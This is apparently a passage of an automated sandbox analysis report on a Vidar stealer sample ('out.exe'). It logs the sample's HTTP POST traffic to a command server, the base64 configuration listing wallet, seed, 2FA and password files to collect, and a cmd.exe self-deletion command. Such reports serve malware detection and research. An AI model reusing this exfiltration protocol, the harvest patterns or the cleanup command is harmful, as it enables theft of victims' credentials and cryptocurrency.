                                                                                                                                                                                        Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        19192.168.2.54996349.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:50 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAK
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------HDHJEBFBFHJECAKFCAAKCont
                                                                                                                                                                                        2024-10-07 18:35:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:51 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:51 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                        Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        20192.168.2.54997449.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:52 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJE
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 461
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:52 UTC461OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 47 43 41 45 47 49 49 4a 4b 46 49 45 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 47 43 41 45 47 49 49 4a 4b 46 49 45 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 47 43 41 45 47 49 49 4a 4b 46 49 45 48 49 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------DBKEGCAEGIIJKFIEHIJEContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------DBKEGCAEGIIJKFIEHIJEContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------DBKEGCAEGIIJKFIEHIJECont
                                                                                                                                                                                        2024-10-07 18:35:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:52 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        21192.168.2.54998849.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:54 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 114269
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:54 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------CBGCAFIIECBFIDHIJKFBCont
                                                                                                                                                                                        2024-10-07 18:35:54 UTC16355OUTData Raw: 47 61 57 56 74 49 45 6c 4e 73 62 63 35 50 33 58 58 6a 42 2b 76 48 34 47 75 59 74 50 44 2b 76 58 30 6d 6b 36 62 50 6f 30 56 6c 46 70 38 75 36 53 37 47 4d 75 4d 35 36 67 38 2f 68 33 39 4b 36 75 39 38 50 36 6e 70 6d 71 54 61 70 34 61 6d 68 52 70 7a 75 75 4c 4b 66 50 6c 79 48 2b 38 50 51 2f 6c 39 65 31 4e 62 56 50 47 6b 71 2b 58 48 34 65 74 59 4a 44 78 35 30 6c 32 72 4b 50 66 41 4f 61 38 75 46 56 71 37 70 4e 57 62 76 71 37 4e 4e 2f 6e 2b 4a 39 44 4f 6b 6e 5a 56 55 37 70 57 30 56 30 30 76 79 2f 41 50 46 6b 67 75 64 66 38 4e 36 64 46 38 31 78 39 74 57 36 5a 52 2f 43 69 63 6b 6e 39 66 79 4e 63 6a 34 33 2f 41 4f 52 74 75 2f 38 41 64 6a 2f 39 41 57 75 37 30 48 77 36 2b 6e 58 4d 32 70 61 6a 63 2f 62 4e 56 75 42 69 53 62 47 46 52 66 37 71 6a 73 50 38 38 56 77 6e 6a
                                                                                                                                                                                        Data Ascii: GaWVtIElNsbc5P3XXjB+vH4GuYtPD+vX0mk6bPo0VlFp8u6S7GMuM56g8/h39K6u98P6npmqTap4amhRpzuuLKfPlyH+8PQ/l9e1NbVPGkq+XH4etYJDx50l2rKPfAOa8uFVq7pNWbvq7NN/n+J9DOknZVU7pW0V00vy/APFkgudf8N6dF81x9tW6ZR/Cickn9fyNcj43/AORtu/8Adj/9AWu70Hw6+nXM2pajc/bNVuBiSbGFRf7qjsP88Vwnj
                                                                                                                                                                                        2024-10-07 18:35:54 UTC16355OUTData Raw: 45 39 73 6b 67 53 32 30 6d 35 6a 52 62 2b 32 75 6c 75 62 35 2b 4e 79 32 78 6b 6b 6a 66 6e 50 51 43 4e 47 2f 77 43 42 31 44 44 72 52 6e 38 4b 57 32 6f 2b 58 70 70 57 66 54 37 32 35 6c 73 59 37 59 43 35 59 6d 65 52 49 33 52 39 6e 43 6f 53 6d 63 50 6b 4b 70 2b 55 69 6b 61 30 31 47 53 2f 75 37 36 54 55 35 47 75 72 75 32 4e 70 50 4c 74 47 58 68 77 46 32 48 6a 70 68 51 50 58 38 61 68 74 39 49 6e 74 5a 72 4b 57 47 36 43 74 59 78 76 46 62 66 75 31 49 52 58 4c 46 6c 49 49 2b 59 45 75 32 63 35 36 34 72 4a 34 48 47 79 58 76 53 2f 48 31 2f 34 48 34 6d 38 63 7a 79 36 50 77 78 37 64 4f 33 2f 41 41 37 49 74 54 31 5a 34 76 44 74 7a 72 53 51 49 45 6e 73 4c 64 59 55 38 73 42 56 75 48 4a 6a 6b 77 4f 6e 48 6c 53 6e 32 4a 55 31 72 65 49 72 35 37 58 55 4e 51 74 5a 6b 30 74 48
                                                                                                                                                                                        Data Ascii: E9skgS20m5jRb+2ulub5+Ny2xkkjfnPQCNG/wCB1DDrRn8KW2o+XppWfT725lsY7YC5YmeRI3R9nCoSmcPkKp+Uika01GS/u76TU5Guru2NpPLtGXhwF2HjphQPX8aht9IntZrKWG6CtYxvFbfu1IRXLFlII+YEu2c564rJ4HGyXvS/H1/4H4m8czy6Pwx7dO3/AA7ItT1Z4vDtzrSQIEnsLdYU8sBVuHJjkwOnHlSn2JU1reIr57XUNQtZk0tH
                                                                                                                                                                                        2024-10-07 18:35:54 UTC16355OUTData Raw: 72 69 44 76 56 37 54 76 76 7a 59 2f 35 34 50 2f 41 43 71 6d 42 56 37 54 76 39 62 4a 78 2f 79 78 66 2b 56 5a 56 76 67 59 4a 36 6e 41 79 65 39 52 47 70 58 78 6d 6f 6a 30 72 33 49 62 49 36 34 69 48 6d 6d 6e 70 53 39 61 51 31 5a 61 47 6d 6d 6e 31 2f 6c 54 6a 31 35 36 55 30 2f 67 61 47 55 68 75 41 54 54 53 61 55 6e 46 4e 50 4e 53 79 30 4a 6e 50 61 6b 50 4e 4b 54 39 61 61 54 55 4d 73 51 30 6e 34 30 70 36 39 61 62 6e 69 70 5a 51 68 48 58 72 53 64 2b 39 4c 32 70 4b 6b 59 48 50 76 54 54 30 39 71 58 38 4b 51 6e 48 57 70 59 30 4a 31 70 44 51 4f 61 44 53 4b 4f 2b 72 56 38 4f 36 4e 59 36 39 71 6f 73 74 51 69 61 53 48 59 7a 67 4b 35 55 35 48 75 4b 79 71 33 66 43 56 33 62 32 57 75 43 61 35 6d 57 47 49 52 4d 43 35 37 5a 46 65 5a 6a 6b 33 68 35 70 64 6a 77 73 74 35 66 72
                                                                                                                                                                                        Data Ascii: riDvV7TvvzY/54P/ACqmBV7Tv9bJx/yxf+VZVvgYJ6nAye9RGpXxmoj0r3IbI64iHmmnpS9aQ1ZaGmmn1/lTj156U0/gaGUhuATTSaUnFNPNSy0JnPakPNKT9aaTUMsQ0n40p69abnipZQhHXrSd+9L2pKkYHPvTT09qX8KQnHWpY0J1pDQOaDSKO+rV8O6NY69qostQiaSHYzgK5U5HuKyq3fCV3b2WuCa5mWGIRMC57ZFeZjk3h5pdjwst5fr
                                                                                                                                                                                        2024-10-07 18:35:54 UTC16355OUTData Raw: 6d 6d 67 43 4f 34 2f 34 38 37 6a 2f 72 6e 2f 55 56 6e 36 5a 2f 72 33 2f 33 4b 30 4c 6e 49 73 72 6a 2f 63 2f 71 4b 7a 39 4d 2f 77 42 65 2f 77 44 75 55 34 2f 43 77 52 71 55 74 47 4b 41 4b 51 42 69 6b 70 32 4b 4d 55 68 58 47 34 70 63 55 34 43 6c 78 2f 6e 4e 46 77 75 4d 78 52 54 38 55 42 54 52 63 56 78 6f 46 47 4b 65 46 50 70 54 68 47 33 70 53 75 46 79 4c 46 4c 69 70 66 4c 78 31 49 46 4e 4f 77 64 5a 42 53 35 68 58 47 34 6f 32 30 76 6d 52 44 75 54 39 42 51 5a 30 48 53 4d 6e 36 6d 69 37 48 64 73 4e 74 4b 45 70 70 75 47 37 4b 6f 70 70 6d 6b 50 56 73 66 53 69 30 67 74 49 6d 45 5a 39 44 53 37 4d 64 63 44 38 61 72 46 32 50 56 6a 2b 64 4e 7a 52 79 73 4f 52 6c 72 35 46 36 79 4c 56 69 30 5a 44 4b 77 55 6b 35 6a 66 74 37 56 6d 35 71 33 59 48 2f 53 44 6e 70 35 62 2f 77
                                                                                                                                                                                        Data Ascii: mmgCO4/487j/rn/UVn6Z/r3/3K0LnIsrj/c/qKz9M/wBe/wDuU4/CwRqUtGKAKQBikp2KMUhXG4pcU4Clx/nNFwuMxRT8UBTRcVxoFGKeFPpThG3pSuFyLFLipfLx1IFNOwdZBS5hXG4o20vmRDuT9BQZ0HSMn6mi7HdsNtKEppuG7KoppmkPVsfSi0gtImEZ9DS7MdcD8arF2PVj+dNzRysORlr5F6yLVi0ZDKwUk5jft7Vm5q3YH/SDnp5b/w
                                                                                                                                                                                        2024-10-07 18:35:54 UTC16355OUTData Raw: 73 6b 50 32 52 4c 79 46 56 31 4f 43 78 6e 6a 6d 64 48 4f 79 56 69 71 75 72 42 56 37 67 6a 42 42 36 67 35 36 31 50 74 38 44 65 33 49 76 75 52 58 31 54 4e 62 58 56 52 2f 38 41 67 54 39 53 37 52 56 43 48 57 62 43 2b 74 4c 69 35 73 30 75 6f 66 73 74 79 73 45 30 56 77 36 76 75 44 37 74 72 71 77 56 65 36 6b 45 59 50 55 48 4e 58 36 39 43 68 69 49 56 34 38 30 44 78 38 56 67 36 75 46 6e 79 56 41 6f 6f 35 70 6a 4f 69 75 46 6b 6b 45 53 42 58 6b 6b 6b 49 7a 74 52 46 4c 73 51 4f 35 77 44 67 64 7a 57 6b 35 78 68 46 79 6c 73 6a 47 6e 54 6c 56 6d 6f 51 56 32 78 39 58 39 50 31 7a 55 39 4c 67 65 47 78 75 7a 44 47 37 37 32 55 52 6f 32 57 77 42 6e 6b 48 73 42 57 50 61 58 30 57 6f 58 2b 6c 72 44 70 6d 73 77 77 58 71 33 44 78 2b 59 41 78 75 41 6b 54 4f 6f 6a 62 79 77 4d 6b 72
                                                                                                                                                                                        Data Ascii: skP2RLyFV1OCxnjmdHOyViqurBV7gjBB6g561Pt8De3IvuRX1TNbXVR/8AgT9S7RVCHWbC+tLi5s0uofstysE0Vw6vuD7trqwVe6kEYPUHNX69ChiIV480Dx8Vg6uFnyVAoo5pjOiuFkkESBXkkkIztRFLsQO5wDgdzWk5xhFylsjGnTlVmoQV2x9X9P1zU9LgeGxuzDG772URo2WwBnkHsBWPaX0WoX+lrDpmswwXq3Dx+YAxuAkTOojbywMkr
                                                                                                                                                                                        2024-10-07 18:35:54 UTC16139OUTData Raw: 4b 4b 4b 51 30 44 43 69 69 6b 6f 51 42 51 61 4b 51 30 78 68 52 52 52 51 41 6c 46 46 46 41 78 44 52 53 30 6c 41 42 53 55 74 4a 51 4d 4b 53 67 30 55 44 51 55 6c 42 6f 6f 47 4a 52 51 61 4b 41 41 30 6c 46 46 4d 59 6c 46 46 42 6f 41 53 6b 70 61 54 76 51 4d 4b 4b 4b 44 51 4d 53 6b 4e 4c 53 47 67 59 55 6c 4c 53 55 41 4a 52 52 52 51 4d 53 69 69 69 67 59 6c 4a 53 30 6c 41 77 70 4b 57 6b 70 6a 43 6b 70 61 53 67 59 6c 42 6f 6f 4e 41 30 4a 53 55 74 4a 51 41 55 30 30 36 6d 6d 67 59 55 55 55 55 44 45 70 4b 44 52 51 4d 44 53 55 55 55 44 45 6f 6f 6f 6f 47 4a 53 55 47 69 67 61 43 6b 6f 70 4f 39 41 78 61 51 30 47 67 30 41 4a 53 64 71 4b 4b 43 68 4b 51 30 34 30 30 30 44 51 74 4a 52 52 51 4d 54 36 55 6c 4c 53 55 41 49 65 61 4b 44 7a 52 51 55 4a 6e 69 6b 36 30 70 70 4b 42 68
                                                                                                                                                                                        Data Ascii: KKKQ0DCiikoQBQaKQ0xhRRRQAlFFFAxDRS0lABSUtJQMKSg0UDQUlBooGJRQaKAA0lFFMYlFFBoASkpaTvQMKKKDQMSkNLSGgYUlLSUAJRRRQMSiiigYlJS0lAwpKWkpjCkpaSgYlBooNA0JSUtJQAU006mmgYUUUUDEpKDRQMDSUUUDEooooGJSUGigaCkopO9AxaQ0Gg0AJSdqKKChKQ04000DQtJRRQMT6UlLSUAIeaKDzRQUJnik60ppKBh
                                                                                                                                                                                        2024-10-07 18:35:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:55 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        22192.168.2.54999849.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:56 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----GIEGHJEGHJKFIEBFHJKK
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------GIEGHJEGHJKFIEBFHJKKContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------GIEGHJEGHJKFIEBFHJKKContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------GIEGHJEGHJKFIEBFHJKKCont
                                                                                                                                                                                        2024-10-07 18:35:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:56 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        23192.168.2.54999949.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:57 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:57 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 62 33 64 30 61 64 35 65 32 34 62 63 63 64 36 64 31 39 33 66 36 62 33 30 61 30 61 38 34 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 34 34 66 64 31 36 33 64 36 64 34 65 30 61 63 33 37 65 34 30 33 32 62 63 62 66 62 62 36 61 66 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                        Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"db3d0ad5e24bccd6d193f6b30a0a847b------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="build_id"744fd163d6d4e0ac37e4032bcbfbb6af------CGHDAKKJJJKJKECBGCGDCont
                                                                                                                                                                                        2024-10-07 18:35:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:58 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-07 18:35:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:14:34:55
                                                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                                                        Path:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\out.exe"
                                                                                                                                                                                        Imagebase:0x20000
                                                                                                                                                                                        File size:393'216 bytes
                                                                                                                                                                                        MD5 hash:7A2F8827805ABA605AC201A9F0C2CB03
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                        Start time:14:35:58
                                                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKEBFHIJECFI" & exit
                                                                                                                                                                                        Imagebase:0x790000
                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                        Start time:14:35:58
